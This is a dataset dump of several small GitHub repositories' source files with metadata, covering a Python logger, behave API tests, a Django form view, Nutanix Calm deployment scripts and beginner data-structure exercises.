print href\n\n # Translate data to boolean features\n alt = alt.lower()\n ad = int('ad' in alt)\n\n # Create list of features for page\n linkData = [imgW,imgH, aspect, ad]\n\n # Add element to dataset\n adData.append(linkData)\n \n \n # Write data to 
csv for classification by MATLAB\n with open('urlData.csv', 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n writer.writerows(adData)\n\n" } ]
3
airmonitor/fastlogging
https://github.com/airmonitor/fastlogging
1a599f2a309f291fc411592332f400c0ba9850bf
8e07e6e6edb765767009c0823fbd3599101a99af
f40986e2c16a10534c91764d772cc7075f9e2176
refs/heads/master
2021-05-19T03:20:54.746028
2019-12-07T06:13:04
2019-12-07T06:13:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6734693646430969, "alphanum_fraction": 0.6734693646430969, "avg_line_length": 35.5, "blob_id": "5134a41d7977c0addffd0d868f91444c92a32e85", "content_id": "59487c454cf54c65b5b275336ae042a593956760", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "permissive", "max_line_length": 47, "num_lines": 4, "path": "/examples/opt_test.py", "repo_name": "airmonitor/fastlogging", "src_encoding": "UTF-8", "text": "\ndef bar():\n logger.debug(\"This is a debug message\")\n logger.info(\"This is an info message\")\n logger.warning(\"This is a warning message\")\n" } ]
1
lcaparros/be-python-cucumber-template
https://github.com/lcaparros/be-python-cucumber-template
b09261a70d9c8d5279b8cdf252c8a9d914a5b87b
e89648ede73a004b269c8687936df9ec6d68ae4c
4e058749c5b21daf1523ffa8652937b1f2e1b9aa
refs/heads/main
2023-04-20T09:20:52.341668
2021-04-20T08:04:06
2021-04-20T08:04:06
359,493,957
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6829268336296082, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 19, "blob_id": "d888cf89054dc1c9c9e432547667998104ed1c76", "content_id": "1e774c3b7405e9b1020dbf63d863fa10aaaa6ba8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/features/environment.py", "repo_name": "lcaparros/be-python-cucumber-template", "src_encoding": "UTF-8", "text": "\n\ndef before_all(context):\n print(\"Before all\")\n\n\ndef before_scenario(context, scenario):\n print(\"Before scenario\")\n\n" }, { "alpha_fraction": 0.6239870190620422, "alphanum_fraction": 0.6320907473564148, "avg_line_length": 29.09756088256836, "blob_id": "e975cac19617195fe5ff7ebf6fcc441f67d34c62", "content_id": "52b4757e2dc85d6100c6913bac703d6ea0169ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 75, "num_lines": 41, "path": "/features/steps/test.py", "repo_name": "lcaparros/be-python-cucumber-template", "src_encoding": "UTF-8", "text": "from log import get_custom_logger\nimport requests\nimport json\nfrom utils import *\nfrom behave import *\n\nlog = get_custom_logger()\n\n\n@when('A {method} request is sent to {url}')\ndef request_is_sent(context, method, url):\n payload = \"{\\n \\\"key1\\\": 1,\\n \\\"key2\\\": \\\"value2\\\"\\n}\"\n headers = {\n 'Content-Type': \"application/json,text/plain\",\n 'User-Agent': \"PostmanRuntime/7.15.0\",\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"e908a437-88ea-4b00-af53-7a9a49033830,ba90e008-0f7f-4576-beb8-b7739c8961f1\",\n 'Host': \"httpbin.org\",\n 'accept-encoding': \"gzip, deflate\",\n 'content-length': \"42\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n response = requests.request(method, url, data=payload, headers=headers)\n context.response = response\n log.info(pretty_request(response.request))\n\n\n@then('Response code is {code}')\ndef response_code_is(context, code):\n log.info(pretty_response(context.response))\n assert context.response.status_code == int(code)\n\n\n@then('Response message is {message}')\ndef response_message_is(context, message):\n response = context.response.json()\n log.info(\"Message is: \" + response[\"message\"])\n assert response[\"message\"] == message\n" } ]
2
endjack/cbv
https://github.com/endjack/cbv
f2159302e896cc0f7c2aa64f6d302e3bec5989fd
2e42fa2313bf3301d20ae2a530660820d1171dff
bedcf6fc9b742a78c01e44b62d763d1e521570ab
refs/heads/master
2023-05-07T20:57:11.122373
2021-06-02T00:03:22
2021-06-02T00:03:22
372,990,821
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6822916865348816, "alphanum_fraction": 0.6822916865348816, "avg_line_length": 22.875, "blob_id": "2d834d927cdb43c951ae42dfe7810374cc2605c7", "content_id": "85dfc33db0a67d620da721a1af6e3aeeba0ccd31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 48, "num_lines": 8, "path": "/core/urls.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "\nfrom django.contrib import admin\nfrom django.urls import path\nfrom cbv.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', IndexView.as_view(), name=\"index\"),\n]\n" }, { "alpha_fraction": 0.7552083134651184, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 18.299999237060547, "blob_id": "bd6a82b752d39f80d361c9adad69687165c17ae4", "content_id": "f6b4bf9890068ef19d3d606e953d7e001cf2ed72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/cbv/models.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib import admin\n\n# Create your models here.\n\nclass Pessoa(models.Model):\n nome = models.CharField(max_length=200)\n\n\nadmin.site.register(Pessoa)" }, { "alpha_fraction": 0.720893144607544, "alphanum_fraction": 0.720893144607544, "avg_line_length": 30.149999618530273, "blob_id": "384035c583e87b3ea803c0e697a1e1249b8f402b", "content_id": "104a9da9b429063c296cf1ccd902ac837f9e6fde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 57, "num_lines": 20, "path": "/cbv/views.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from cbv.forms import PessoaForm\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView, View\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView\nfrom .models import *\n\n# Create your views here.\n\n# CRIANDO E LISTANDO NA MESMA TEMPLATE\nclass IndexView(CreateView):\n template_name = 'index.html'\n model = Pessoa\n form_class = PessoaForm\n success_url = reverse_lazy('index')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"objects_pessoas\"] = Pessoa.objects.all()\n return context\n " }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.6740331649780273, "avg_line_length": 21.625, "blob_id": "c1baee5ffc4204045b9470c5718ce32131dcceff", "content_id": "4b593629103cf92847af1f01dc7646481d72048e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/cbv/forms.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.forms import fields\nfrom .models import *\n\nclass PessoaForm(forms.ModelForm):\n class Meta:\n model = Pessoa\n fields = '__all__'\n" } ]
4
lilyinstarlight/log.py
https://github.com/lilyinstarlight/log.py
33a069321173a9e2c5ae95d18bc75ef1eb9c86f0
3e1ccf725f7aabb113037eb920fb504058105bcb
0e3eddba5ca89368f7dd1a790ee6baff60d38ac8
refs/heads/master
2021-06-06T06:30:35.083213
2016-07-22T03:04:40
2016-07-22T03:04:40
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6972476840019226, "alphanum_fraction": 0.6972476840019226, "avg_line_length": 35.33333206176758, "blob_id": "dc3b3d7f1437ce9a412ecaf7a4550f9ffaa90251", "content_id": "7a8c029d2e40a5a77a18e1e5e394dd8c17c93d94", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 109, "license_type": "permissive", "max_line_length": 94, "num_lines": 3, "path": "/README.md", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "log.py\n======\nlog.py is a logger for web applications that use [web.py](https://github.com/fkmclane/web.py).\n" }, { "alpha_fraction": 0.6594203114509583, "alphanum_fraction": 0.6594203114509583, "avg_line_length": 18.714284896850586, "blob_id": "698cb09bd94c9c05cec51bc3acf282740f7d5f6c", "content_id": "92ccd5bd893d15acdb56c470ddac2081afd2463d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "permissive", "max_line_length": 47, "num_lines": 7, "path": "/log/__init__.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "# module details\nfrom .log import name, version\n\n# classes\nfrom .log import Log, HTTPLog\n\n__all__ = ['name', 'version', 'Log', 'HTTPLog']\n" }, { "alpha_fraction": 0.5432692170143127, "alphanum_fraction": 0.549879789352417, "avg_line_length": 26.278688430786133, "blob_id": "b019cd743b031360dae88eb0c6b3372b742485b1", "content_id": "c0e762bb6a63568b0d91129b41e13053cfbfb3f0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1664, "license_type": "permissive", "max_line_length": 139, "num_lines": 61, "path": "/log/log.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport traceback\n\n\nname = \"log.py\"\nversion = \"0.0a0\"\n\n\nclass Log(object):\n def __init__(self, log=None):\n if log:\n os.makedirs(os.path.dirname(log), exist_ok=True)\n self.log = open(log, 'a', 1)\n else:\n self.log = sys.stdout\n\n def timestamp(self):\n return time.strftime('[%d/%b/%Y:%H:%M:%S %z]')\n\n def write(self, string):\n if self.log:\n self.log.write(string)\n\n def message(self, message):\n self.write(self.timestamp() + ' ' + message + '\\n')\n\n def head(self, header):\n self.message(header)\n self.message('=' * len(header))\n\n def info(self, message):\n self.message('INFO: ' + message)\n\n def warning(self, message):\n self.message('WARNING: ' + message)\n\n def error(self, message):\n self.message('ERROR: ' + message)\n\n def exception(self, message='Caught Exception'):\n self.error(message + ':\\n\\t' + traceback.format_exc().replace('\\n', '\\n\\t'))\n\n\nclass HTTPLog(Log):\n def __init__(self, log=None, access_log=None):\n Log.__init__(self, log)\n\n if access_log:\n os.makedirs(os.path.dirname(access_log), exist_ok=True)\n self.access_log = open(access_log, 'a', 1)\n else:\n self.access_log = sys.stdout\n\n def access_write(self, string):\n if self.access_log:\n self.access_log.write(string)\n\n def request(self, host, request, code='-', size='-', rfc931='-', authuser='-'):\n self.access_write(host + ' ' + rfc931 + ' ' + authuser + ' ' + self.timestamp() + ' \"' + request + '\" ' + code + ' ' + size + '\\n')\n" }, { "alpha_fraction": 0.6539792418479919, "alphanum_fraction": 0.6574394702911377, "avg_line_length": 18.266666412353516, "blob_id": "1f321f33d4b2d282f83ba4d2c781aa2424aaa1c7", "content_id": 
"f68196a45e491fcf4e0b6393f0d31b70d72a5641", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 64, "num_lines": 15, "path": "/setup.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom distutils.core import setup\n\nfrom log import name, version\n\n\nsetup(\n name=name,\n version=version,\n description='a logger for web applications that use web.py',\n license='MIT',\n author='Foster McLane',\n author_email='[email protected]',\n packages=['log'],\n)\n" } ]
4
msmenezesbr84/nutanix_Personal_mm
https://github.com/msmenezesbr84/nutanix_Personal_mm
543a1a8470ea414b113074b084445356aeee3d02
2e4223b3d9f802619dab2ac558471462a589b8c1
eea2c99c79e1e91e09d054e8578ef833ca288a59
refs/heads/master
2022-12-01T18:58:16.108308
2020-08-07T02:39:02
2020-08-07T02:39:02
285,717,969
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7854251265525818, "avg_line_length": 81.33333587646484, "blob_id": "0d55557598fdc563a61c1ce64cafdaa5b450f547", "content_id": "862eaa02272ab05060d0e3d8906665311bea5d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 247, "license_type": "no_license", "max_line_length": 193, "num_lines": 3, "path": "/azuredevops-master/README.md", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "# CI/CD Demo with Nutanix Calm DSL and Azure DevOps\n\n[![Build Status](https://dev.azure.com/pipoe2h/Calm/_apis/build/status/pipoe2h.azuredevops?branchName=master)](https://dev.azure.com/pipoe2h/Calm/_build/latest?definitionId=1&branchName=master)\n" }, { "alpha_fraction": 0.7597765326499939, "alphanum_fraction": 0.7597765326499939, "avg_line_length": 35, "blob_id": "ed0d12d505d53b84bb248d857209d35080241fab", "content_id": "20cdd7fe83d35c4da2d3993acd4ef632ae8fbc4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/azuredevops-master/variablestemplate.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "from calm.dsl.builtins import CalmVariable as Variable\n\nENVIRONMENT = Variable.WithOptions.Predefined.string(\n [\"DEV\", \"PROD\"], default=\"DEV\", is_mandatory=True, runtime=True\n)" }, { "alpha_fraction": 0.5867260694503784, "alphanum_fraction": 0.5913350582122803, "avg_line_length": 37.744049072265625, "blob_id": "2ae344fa9fb6adf3176e2fd80d7cb44bbf0ca6d3", "content_id": "cbfd45f3c38297acb3e0026d56d8eccf02cafd9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6509, "license_type": "no_license", "max_line_length": 133, "num_lines": 168, "path": "/azuredevops-master/deprecated/calm.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "import urllib3\nimport json\nimport os\nfrom base64 import b64encode\nimport sys\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nclass PcManager():\n\n def __init__(self, ip_addr, username, password):\n # Initialise the options.\n self.ip_addr = ip_addr\n self.username = username\n self.password = password\n self.rest_params_init()\n\n # Initialize REST API parameters\n def rest_params_init(self, sub_url=\"\", method=\"\",\n body=None, content_type=\"application/json\", response_file=None):\n self.sub_url = sub_url\n self.body = body\n self.method = method\n self.content_type = content_type\n self.response_file = response_file\n\n # Create a REST client session.\n def rest_call(self): \n base_url = 'https://%s:9440/api/nutanix/v3/%s' % (\n self.ip_addr, self.sub_url)\n if self.body and self.content_type == \"application/json\":\n self.body = json.dumps(self.body)\n\n creds = '%s:%s' % (self.username, self.password)\n base64string = b64encode(creds.encode()).strip().decode()\n \n header = {\n 'Authorization': 'Basic %s' % base64string,\n 'Content-Type': '%s; charset=utf-8' % self.content_type\n }\n\n http = 
urllib3.PoolManager(headers=header)\n response = http.request(method=self.method, url=base_url, body=self.body)\n\n if response:\n response = json.loads(response.data.decode('UTF-8'))\n return response\n\n def search_blueprint(self, blueprint_name):\n body = {\n \"filter\": \"name==%s\" % blueprint_name,\n \"length\": 250,\n \"offset\": 0\n }\n self.rest_params_init(sub_url=\"blueprints/list\", method=\"POST\", body=body)\n return self.rest_call()\n \n def get_blueprint(self, blueprint_uuid):\n sub_url = 'blueprints/%s' % blueprint_uuid\n self.rest_params_init(sub_url=sub_url, method=\"GET\")\n return self.rest_call()\n\n def launch_blueprint(self, blueprint_uuid, blueprint_spec):\n sub_url = 'blueprints/%s/launch' % blueprint_uuid\n self.rest_params_init(sub_url=sub_url, method=\"POST\", body=blueprint_spec)\n return self.rest_call()\n\n def get_blueprint_uuid(self, blueprint_name):\n bp = self.search_blueprint(blueprint_name)\n bp_uuid = bp['entities'][0]['metadata']['uuid']\n return bp_uuid \n\nclass CalmAzureDevOps(object):\n\n ###########################################################################\n # Main execution path\n ###########################################################################\n\n def __init__(self):\n \"\"\"Main execution path \"\"\"\n\n # PrismCentralInventory data\n self.data = {} # All PrismCentral data\n\n # Read settings, environment variables, and CLI arguments\n self.read_environment()\n\n def read_environment(self):\n \"\"\" Reads the settings from environment variables \"\"\"\n # Setup PC IP\n if os.getenv(\"PC_IP\"):\n self.ip_addr = os.getenv(\"PC_IP\")\n # Setup credentials\n if os.getenv(\"PC_USERNAME\"):\n self.username = os.getenv(\"PC_USERNAME\")\n if os.getenv(\"PC_PASSWORD\"):\n self.password = os.getenv(\"PC_PASSWORD\")\n # Setup Calm\n if os.getenv(\"CALM_APPNAME\"):\n self.calm_appname = os.getenv(\"CALM_APPNAME\")\n if os.getenv(\"CALM_APPPROFILENAME\"):\n self.calm_appprofilename = os.getenv(\"CALM_APPPROFILENAME\")\n if os.getenv(\"CALM_BPNAME\"):\n self.calm_bpname = os.getenv(\"CALM_BPNAME\")\n if os.getenv(\"CALM_PRJNAME\"):\n self.calm_prjname = os.getenv(\"CALM_PRJNAME\")\n\n # Verify Prism Central IP was set\n if not hasattr(self, 'ip_addr'):\n msg = 'Could not find values for PrismCentral ip_addr. They must be specified via either ini file, ' \\\n 'command line argument (--ip-addr, -i), or environment variables (PC_IP_ADDR)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n\n # Verify credentials were set\n if not hasattr(self, 'username'):\n msg = 'Could not find values for PrismCentral username. They must be specified via either ini file, ' \\\n 'command line argument (--username, -u), or environment variables (PC_USERNAME)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n if not hasattr(self, 'password'):\n msg = 'Could not find values for PrismCentral password. 
They must be specified via either ini file, ' \\\n 'command line argument (--password, -p), or environment variables (PC_PASSWORD)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n\n self.manager = PcManager(self.ip_addr, self.username, self.password)\n\n bp_uuid, bp_spec = self.build_blueprintSpec(self.calm_appname, self.calm_appprofilename, self.calm_bpname, self.calm_prjname)\n \n self.manager.launch_blueprint(bp_uuid, bp_spec)\n\n def build_blueprintSpec(self, calm_appname, calm_appprofilename, calm_bpname, calm_prjname): \n bp_uuid = self.manager.get_blueprint_uuid(calm_bpname)\n bp_spec = self.manager.get_blueprint(bp_uuid)\n bp_spec.pop('status')\n bp_spec['spec'].pop('name')\n bp_spec['spec']['application_name'] = calm_appname\n\n app_profile_uuid = None\n app_profile_list = bp_spec['spec']['resources']['app_profile_list']\n i = 0\n while i < len(app_profile_list):\n app_profile = app_profile_list[i]\n if app_profile['name'] == calm_appprofilename:\n app_profile_uuid = app_profile['uuid']\n break \n i += 1\n if app_profile_uuid == None:\n raise Exception(\"App profile with name \" + calm_appprofilename + \" not found in list\")\n app_profile_reference = {}\n app_profile_reference['kind'] = 'app_profile'\n app_profile_reference['uuid'] = app_profile_uuid\n bp_spec['spec']['app_profile_reference'] = app_profile_reference\n return bp_uuid, bp_spec\n\nCalmAzureDevOps()\n" }, { "alpha_fraction": 0.6246617436408997, "alphanum_fraction": 0.6312330961227417, "avg_line_length": 20.213115692138672, "blob_id": "3e3720c6a9517bbe1e2f0b6131c281c900d9be34", "content_id": "046c810d48191d5778e9b24199e32563bfab9ab2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 103, "num_lines": 122, "path": "/azuredevops-master/main.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "import os\nimport json\n\nfrom calm.dsl.builtins import Service, Package, Substrate\nfrom calm.dsl.builtins import Deployment, Profile, Blueprint\nfrom calm.dsl.builtins import action, ref, basic_cred, CalmTask\nfrom calm.dsl.builtins import read_local_file, read_ahv_spec, read_vmw_spec, read_file\nfrom calm.dsl.builtins import vm_disk_package\nfrom calm.dsl.builtins import read_env\n\nimport sys\nsys.path.append('')\n\nfrom variablestemplate import *\n\n# Import .env variables\nENV = read_env()\n\nAHV_CENTOS_76 = vm_disk_package(\n name=\"AHV_CENTOS_76\",\n config={\n # By default image type is set to DISK_IMAGE\n \"image\": {\n \"source\": ENV.get(\"CENTOS_IMAGE_SOURCE\")\n }\n },\n)\n\n# Credentials definition\nCREDENTIALS = read_env('.local/credentials')\n\nOS_USERNAME = os.getenv(\"OS_USERNAME\") or CREDENTIALS.get(\"OS_USERNAME\")\nOS_PASSWORD = os.getenv(\"OS_PASSWORD\") or CREDENTIALS.get(\"OS_PASSWORD\")\n\nCred_OS = basic_cred(\n username=OS_USERNAME,\n password=OS_PASSWORD,\n name=\"Cred_OS\",\n default=True,\n type=\"PASSWORD\"\n)\n\n\nclass CentOS(Service):\n \"\"\"CentOS for Launching Demo\"\"\"\n\n\nclass CentOS_Package(Package):\n \"\"\"CentOS Package\"\"\"\n\n services = [ref(CentOS)]\n\n\nclass CentOS_Substrate(Substrate):\n \"\"\"CentOS Substrate\"\"\"\n\n os_type = \"Linux\"\n\n provider_spec = read_ahv_spec(\n \"centos-spec.yaml\",\n disk_packages={1: AHV_CENTOS_76}\n )\n\n provider_spec.spec[\"name\"] = \"@@{calm_application_name}@@\"\n provider_spec.spec[\"resources\"][\"nic_list\"][0][\"subnet_reference\"][\"name\"] = ENV.get(\"SUBNET_NAME\")\n 
provider_spec.spec[\"resources\"][\"nic_list\"][0][\"subnet_reference\"][\"uuid\"] = ENV.get(\"SUBNET_UUID\")\n\n\n readiness_probe = {\n \"disabled\": False,\n \"delay_secs\": \"60\",\n \"connection_type\": \"SSH\",\n \"connection_port\": 22,\n \"credential\": ref(Cred_OS),\n }\n\n\nclass CentOS_Deployment(Deployment):\n \"\"\"CentOS Deployment\"\"\"\n\n min_replicas = \"1\"\n max_replicas = \"1\"\n\n packages = [ref(CentOS_Package)]\n substrate = ref(CentOS_Substrate)\n\n\nclass Default(Profile):\n \"\"\"CentOS Profile\"\"\"\n\n ENVIRONMENT = ENVIRONMENT\n\n deployments = [\n CentOS_Deployment\n ]\n\n\nclass CentOS_Blueprint(Blueprint):\n \"\"\"CentOS Blueprint\"\"\"\n\n credentials = [\n Cred_OS\n ]\n services = [\n CentOS\n ]\n packages = [\n CentOS_Package,\n AHV_CENTOS_76\n ]\n substrates = [\n CentOS_Substrate\n ]\n profiles = [Default]\n\n\ndef main():\n print(Workload_Mobility_Setup.json_dumps(pprint=True))\n\n\nif __name__ == \"__main__\":\n main()" } ]
4
wsv587/Data-Structure-and-Algorithms
https://github.com/wsv587/Data-Structure-and-Algorithms
d6f028874d925930b73eb856b5fd8359d4244920
c9eeccf3e5271cb053d74dcf5e552611ed19f632
4fb87c66f4ab6d04393919cc1b7e0f517577292d
refs/heads/master
2021-07-02T06:27:01.940337
2020-10-12T01:55:22
2020-10-12T01:55:22
181,307,893
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5500633716583252, "alphanum_fraction": 0.6463878154754639, "avg_line_length": 16.55555534362793, "blob_id": "a45ba08366fde2d757665422a287d0c4ee0fd3f3", "content_id": "df3f6adef3638508090bb318b9905c829ece0b17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 871, "license_type": "permissive", "max_line_length": 67, "num_lines": 45, "path": "/Python/SwapTwoValue.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# 方式一 中间变量\ndef swap1(value1, value2):\n temp = value1\n value1 = value2\n value2 = temp\n return value1, value2\n\n\ntup = swap1(666, 999)\nprint(tup)\n\n\n# 方式二 python特有\ndef swap2(value1, value2):\n value1, value2 = value2, value1\n return value1, value2 # 返回元组,不需要加括号\n\n\nvalueA = 10\nvalueB = 20\ntup = swap2(valueA, valueB) # 元组\nprint(tup)\n\n\n# 方式三 数学算法\ndef swap3(value1, value2):\n value1 = value1 - value2\n value2 = value1 + value2 # value2 = (value1 - value2) + value2\n value1 = value2 - value1 # value1 = value1 - (value1 - value2)\n return value1, value2\n\n\ntup = swap3(1, 2)\nprint(tup)\n\n# 方式四 按位操作 异或\ndef swap4(value1, value2):\n value1 = value1 ^ value2\n value2 = value1 ^ value2\n value1 = value1 ^ value2\n\n return value1, value2\n\n\nprint(swap4(111, 222))" }, { "alpha_fraction": 0.47708702087402344, "alphanum_fraction": 0.4884546995162964, "avg_line_length": 21.309524536132812, "blob_id": "5c9d6c89bf75f0bd938ddd54ec99fee71dd67992", "content_id": "30779bfd6b110628a203dc0e2288fcd89e7c566a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "permissive", "max_line_length": 47, "num_lines": 126, "path": "/Python/List/LinkList.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "class Node:\n __slots__ = ['data', 'next']\n\n def __init__(self):\n self.data = None\n self.next = None\n\n def __init__(self, data, next):\n self.data = data\n self.next = next\n\n\nclass LinkList:\n __slots__ = ['first', 'last', '__size']\n\n def __init__(self):\n self.first = None\n self.last = None\n self.__size = 0\n\n def add(self, obj):\n if self.__size == 0:\n self.first = Node(obj, self.first)\n else:\n prev = self.__node(self.__size - 1)\n prev.next = Node(obj, None)\n self.__size += 1\n\n def insert(self, obj, idx):\n if idx == 0:\n self.first = Node(obj, self.first)\n else:\n prev = self.__node(idx - 1)\n prev.next = Node(obj, prev.next)\n self.__size += 1\n\n def remove_at_index(self, idx):\n if idx == 0:\n self.first = self.first.next\n else:\n prev = self.__node(idx - 1)\n prev.next = prev.next.next\n self.__size -= 1\n\n def remove(self, obj):\n prev = self.__prev_node_of(obj)\n prev.next = prev.next.next\n self.__size -= 1\n\n def pop(self):\n prev = self.__node(self.__size - 1)\n prev.next = prev.next.next\n self.__size -= 1\n\n def object_at_index(self, idx):\n node = self.__node(idx)\n return node.data\n\n def index_of(self, obj):\n node = self.__node_of(obj)\n return node.data\n\n def contains(self, obj):\n node = self.first\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return True\n node = node.next\n return False\n\n def is_empty(self):\n return self.__size == 0\n\n def clear(self):\n self.first = None\n self.__size = 0\n\n def size(self):\n return self.__size\n\n def __node(self, idx):\n node = self.first\n for i in range(0, idx):\n node = node.next\n return node\n\n def __node_of(self, obj):\n node = 
self.first\n\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return node\n node = node.next\n return None\n\n def __prev_node_of(self, obj):\n node = self.first\n prev = None\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return node\n prev = node\n node = node.next\n return prev\n\n @classmethod\n def link_list(cls):\n return cls()\n\n# list = LinkList()\n# list.__element = [2]\n#\n# print(list.__element)\n\n\nlist = LinkList.link_list()\nlist.add('1')\nlist.add('2')\nlist.add('3')\nprint(list.size())\nlist.insert('0', 1)\nprint(list.size())\nlist.insert('0', 0)\nprint(list.size())\nlist.insert('5', 5)\nprint(list.size())\n\n\n\n\n" }, { "alpha_fraction": 0.824999988079071, "alphanum_fraction": 0.824999988079071, "avg_line_length": 19, "blob_id": "12a3606b180dab10c1fd44f6624ae1a4c22c1ba8", "content_id": "05c1e8914db9603b61536cd45d69cc5c531d35f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# Data-Structure-and-Algorithms\n数据结构和算法\n" }, { "alpha_fraction": 0.4519940912723541, "alphanum_fraction": 0.506646990776062, "avg_line_length": 12.816326141357422, "blob_id": "bf75a1c2bf198b0bc02638f4c40e12bd863f9fb6", "content_id": "65c16a8ebe9ad4451d9e959385a473f7adadbf88", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 777, "license_type": "permissive", "max_line_length": 43, "num_lines": 49, "path": "/Python/Fibonacci.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# 斐波那契数列\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34 ...\n\n# 递归方式实现斐波那契数列\ndef fib(n):\n if n <= 1:\n return n\n return fib(n - 1) + fib(n - 2)\n\n\nresult = fib(8)\n\n\nprint(result)\n\n# for循环方式实现斐波那契数列\ndef fib1(n):\n if n <= 1:\n return n\n\n first = 0\n second = 1\n sum = 0\n for i in range(0, n - 1):\n sum = first + second\n first = second\n second = sum\n\n return sum\n\n\nresult = fib1(8)\nprint(result)\n\n\n# 数组方式实现斐波那契数列\ndef fib2(n):\n if n <= 1:\n return n\n\n arr = [0, 1]\n # range(min, max)不包括max, 所以此处是n+1\n for i in range(2, n+1):\n arr.append(arr[i - 1] + arr[i - 2])\n return max(arr)\n\n\nresult = fib2(8)\nprint(result)\n" }, { "alpha_fraction": 0.5484452247619629, "alphanum_fraction": 0.5669220089912415, "avg_line_length": 22.606382369995117, "blob_id": "f9d1a16698d71c8c616700846fccd934376fb108", "content_id": "88bf55568019e2e170e9cc577468b7bfaa3f3bac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2535, "license_type": "permissive", "max_line_length": 84, "num_lines": 94, "path": "/Python/List/ArrayList.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "import os\n\n\nclass ArrayList:\n ```创建一个arraylist对象```\n\n # size\n # defaultCount\n # 